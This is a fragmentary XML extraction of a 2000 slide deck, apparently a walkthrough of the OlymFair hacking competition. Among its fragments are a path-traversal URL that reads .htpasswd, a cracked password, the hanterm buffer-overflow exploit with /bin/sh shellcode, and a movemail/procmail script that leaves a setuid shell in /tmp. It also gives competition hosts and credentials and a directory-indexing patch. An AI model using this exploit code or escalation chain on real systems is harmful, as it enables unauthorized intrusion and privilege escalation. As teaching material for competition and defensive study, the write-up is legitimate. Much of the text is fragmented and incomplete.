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2EFB-4C62-41ED-89D4-FD570D69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4EC-7E4F-4684-8E5B-750ECADD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07B3-737F-4205-896E-E46C0A26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0BE9-FF24-4FD4-A3FA-B5508BADE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D84-AD4D-46C5-84C8-6D5A06B9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1FF9-0CAA-4037-9222-59492ECD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5ED9-254C-4790-9C40-35757476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DD8-070F-499C-BA2F-2D68947F6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EEC0-3375-4DE8-8847-7BA7D864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3BE2-3024-4937-A0D5-527ED973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1CB-84F7-4172-9EB2-161D2312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FD9A-9FDB-439D-994A-BFA0DCA6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3BFA-419E-4DA2-9BDB-A8669F835F58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신명조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신명조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신명조"/>
              </a:rPr>
              <a:t> OlymFair Worksh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신명조"/>
              </a:rPr>
              <a:t>Hacking tech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eho O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hara@4dl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hhara@postech.ed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postech.edu/~ohh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ile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66680" y="2514600"/>
            <a:ext cx="693432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gi-bi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ckme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_fil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wfile.c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at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+-----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3352680"/>
            <a:ext cx="9144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657600" y="2819520"/>
            <a:ext cx="144792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438280"/>
            <a:ext cx="26672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’t access thi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.htaccess file with showfile.c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203.227.243.161/cgi-bin/hackme/showfile.cgi?NAME=/cgi-bin/data/.ht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d .htpasswd file from .htaccess with showfile.c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203.227.243.161/cgi-bin/hackme/showfile.cgi?NAME=/cgi-bin/data/.htpassw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ould crack the encrypted password from .htpasswd with Cr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:password = admin:ban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ould access /cgi-bin/data directory with this id and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ould get the way to go to le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203.227.243.161/data/idacces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ge is the form that executes http://203.227.243.161/cgi-bin/data/idaccess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serial nu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000321-9618295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passw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8YEuqYySWogKSQQsOY00zoAjUkxtv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scape Enterprise Server directory indexing vuln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www.securityfocus.com/vdb/bottom.html?vid=10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scape Enterprise Server directory indexing vulnerability patch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200400"/>
            <a:ext cx="723888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Directory Indexing feature can be turned off via the Administration Interface. Selecting Content Management -&gt; Document Preferences and changing Directory Indexing to "none" will disable this featur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so, manually editing the file obj.conf will do the same. Conduct a search for the following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rvice&amp;nbsp;method="(GET|HEAD)"&amp;nbsp;type="magnus-internal/directory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n="index-common"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eplace fn="index-common" with fn="send-error"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/home/forbidden/pass.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ecutable file owner is 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executable file group is wiz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mission is 05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wizard gid to execute /home/forbidden/pass.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2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3.227.243.16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3.227.243.1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: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TCP port : 23, 8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zard setuid or setgid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2590920"/>
            <a:ext cx="868680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-sr-xr-x   1 wizard   wizard      26309 Jan  4 09:40 /sbin/pwdb_chkpw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sr-x   1 wizard   wizard      47692 Mar 29  1999 /sbin/dum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10708 Apr 20  1999 /sbin/cardc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--x--x   1 wizard   wizard       6148 May 15  1999 /usr/X11R6/bin/Xwrap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--x--x   1 wizard   wizard     158180 May 14  1999 /usr/X11R6/bin/hante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33120 Mar 22  1999 /usr/bin/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 3208 Mar 23  1999 /usr/bin/disable-pa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-sr-x---   1 wizard   wizard      42652 Aug 31  1999 /usr/bin/innd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-sr-x---   1 wizard   wizard      40060 Aug 31  1999 /usr/bin/startinnfe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-sr-sr-x   1 wizard   wizard      15816 Jan  7 07:41 /usr/bin/lp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-sr-sr-x   1 wizard   wizard      15608 Jan  7 07:41 /usr/bin/l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-sr-sr-x   1 wizard   wizard      16248 Jan  7 07:41 /usr/bin/lp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zard setuid or setgid files ( Cont.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2590920"/>
            <a:ext cx="8839440" cy="37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--x--x   2 wizard   wizard     517916 Apr  7  1999 /usr/bin/suidper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--x--x   2 wizard   wizard     517916 Apr  7  1999 /usr/bin/sperl5.005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sr-x   1 wizard   wizard      64468 Apr  7  1999 /usr/bin/proc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14036 Apr 16  1999 /usr/bin/rc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10516 Apr 16  1999 /usr/bin/rlog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 7780 Apr 16  1999 /usr/bin/r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xr-sr-x   1 wizard   wizard      17832 May 14  1999 /usr/lib/emacs/20.3/i386-redhat-linux/mov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sr-x   1 wizard   wizard     299364 Apr 20  1999 /usr/sbin/send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16488 Mar 23  1999 /usr/sbin/trace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sr-xr-x   1 wizard   wizard      18040 Jan  8 05:24 /usr/sbin/userhel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rwxr-sr-x   1 wizard   wizard       3860 Apr 20  1999 /sbin/net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ass leve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pass level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id many hackers consume much time in the level 2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level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4042800"/>
            <a:ext cx="220968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wizard e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5490720"/>
            <a:ext cx="220968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wizard u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2594880"/>
            <a:ext cx="220968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wizard uid, gi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4042800"/>
            <a:ext cx="220968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wizard g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5490720"/>
            <a:ext cx="220968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pass.c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2594880"/>
            <a:ext cx="2209680" cy="947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level2 sh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505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352680" y="3124080"/>
            <a:ext cx="221004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2 sh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zard e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it hanterm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3124080"/>
            <a:ext cx="7543800" cy="35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 have no name!@level2 ... ]$ hanterm -hfn `perl -e "print 'A'x240"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n't load english font AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAAAAAAAAAAAAAAAAA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 have no name!@level2 ... ]$ hanterm -hfn `perl -e "print 'A'x250"`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gmentation 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 have no name!@level2 ... ]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2 shel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zard euid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classical buffer overflow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ould get wizard euid shell with 260 buffer size and -450 off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274320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include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OFFSET                         -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RET_POSITION                    2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RANGE        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define NOP                            0x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shellcode[1024]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eb\x1f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jmp 0x1f      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5e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popl %esi     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9\x76\x08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l %esi,0x8(%esi)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74320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31\xc0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xorl %eax,%eax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8\x46\x07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b %eax,0x7(%esi)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9\x46\x0c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l %eax,0xc(%esi)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b0\x0b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b $0xb,%al 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9\xf3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l %esi,%ebx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d\x4e\x08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leal 0x8(%esi),%ecx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d\x56\x0c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leal 0xc(%esi),%edx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cd\x80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int $0x80     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31\xdb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xorl %ebx,%ebx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89\xd8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movl %ebx,%eax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274320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40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inc %eax      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cd\x80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int $0x80        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\xe8\xdc\xff\xff\xff“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call -0x24  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/bin/sh"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.string \"/bin/sh\" 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signed long get_sp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__asm__("movl %esp,%eax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oid main(int argc,char **arg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274320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har buff[RET_POSITION+RANGE+1],*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addr_ptr,ad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signed long s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offset=OFFSET,bsize=RET_POSITION+RANGE+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argc&gt;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ffset=atoi(argv[1]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p=get_sp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=sp-offse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r=buf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3200"/>
            <a:ext cx="75438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r_ptr=(long*)pt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bsize;i+=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(addr_ptr++)=add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bsize-RANGE*2-strlen(shellcode);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[i]=NO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tr=buff+bsize-RANGE*2-strlen(shellcode)-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strlen(shellcode);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(ptr++)=shellcode[i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uff[bsize-1]='\0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2743200"/>
            <a:ext cx="7543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l("/usr/X11R6/bin/hanterm","hanterm",“-hfn",buff,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zard eui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zard u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590920"/>
            <a:ext cx="75438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 have no name!@level2 ... ]$ cat &gt; a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reuid(501,5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l("/bin/sh","sh",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 have no name!@level2 ... ]$ gcc a.c ; ./a.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wizard@level2 ... ]$ whoa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i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wizard@level2 ... ]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to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 /cgi-bin/data/idaccess.cgi and get the way to go to level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zard ui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reate wizard uid, gid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mail program is wizard setgi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mail program output file is wizard g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3657600"/>
            <a:ext cx="75438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wizard@level2 ... ]$ echo haha &gt; tes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wizard@level2 ... ]$ movemail test1 tes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wizard@level2 ... ]$ ls –l test1 tes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rw-r--r--   1 wizard   hackers 0 Jul 10 02:03 test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rw-r--r--   1 wizard   wizard  5 Jul 10 02:03 tes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wizard@level2 ... ]$ cat test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zard uid, gid fi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izard g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mail can execute a arbitrary shell command with wizard uid, gid when the user can create wizard uid, gid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2590920"/>
            <a:ext cx="754380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!/bin/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TH=${PATH}:/usr/lib/emacs/20.3/i386-redhat-lin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por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 &gt; shh.c &lt;&lt;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(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reuid(501,5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tregid(501,50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l("/bin/sh","sh",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8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2743200"/>
            <a:ext cx="75438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cc shh.c -o sh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email shh sh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t &gt; proc &lt;&lt; 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 /bin/chmod 6777 /tmp/sh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1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it cod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743200"/>
            <a:ext cx="7543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ovemail proc /home/wizard/.procmail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haha | /usr/sbin/sendmail -OQueueDirectory=/tmp wiz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leep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f /home/wizard/.procmail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f ./pr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f ./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f ./shh.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m -f ./sh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rm -f ./shh2" | ./shh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2 (20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zard gid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ecute pass.c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38080" y="2590920"/>
            <a:ext cx="7543800" cy="39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ongratulation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ou have passed Level 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our ID : KOR000321-9618295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itial Pass Time Stamp : 2000-06-30 13:59:30GMT+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P for Level 3 is 203.227.243.1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t is protected by ip filter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lease attack and acquire adminstrator's privilege.And then change the index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 under level3 ser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vel 3 Login ID     : level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Level 4 Login Passwd : olymfair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many hackers consume much time in the level 2?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 all hackers tried to find a security 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level2 can be cleared with not a bug but a feature. ( except for hanterm bug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many hackers consume much time in the level 2?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sbin/dump program has a buffer overflow bug and exploit is no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hackers try to exploit this program. However, the exploit is impossible because main function does not return but ex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id many hackers consume much time in the level 2?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r/bin/lprm exploit code generates segmentation fault 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egmentation fault message is not generated by /usr/bin/lprm. The message is generated by /usr/bin/lprm exploit code. It’s an exploit code bu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bout level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onsumed much time so I have no time to attack level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tried to scan level 3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I can’t find opened TCP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idn’t try to attack level 3 from then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seemed to take much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1 ser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03.227.243.16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03.227.243.16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203.227.243.1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was an interesting hacking competition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돋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203.227.243.1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: Solaris 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TCP port : 80, 80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3.227.243.1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: HPUX 11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TCP port : 22, 80, 80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3.227.243.16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 : MS Windows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ed TCP port :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7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, 13, 17, 19, 25, 80, 135, 139, 443, 1025, 1026, 1032, 1723, 33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 203.227.243.16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: Apache Web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80 : Netscape Enterpris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 and 8080 web server has same httpd home dire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scape Enterprise Server has a security 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ass level 1 (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scape Enterprise Server security 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ould see files in the specific directory like be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203.227.243.161/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p-cs-d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can also use ?wp-ver-info, ?wp-html-rend, ?wp-usr-prop, ?wp-ver-diff, ?wp-verify-link, ?wp-start-ver, ?wp-stop-ver, and ?wp-uncheck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ould browse the directories and check the file exis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/>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>Taeho Oh</cp:lastModifiedBy>
  <cp:lastPrinted>1997-02-26T15:00:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2000-07-09T18:23:48Z</dcterms:modified>
  <cp:revision>64</cp:revision>
  <dc:subject/>
  <dc:title>OlymFair Workshop Hacking technique</dc:title>
</cp:coreProperties>
</file>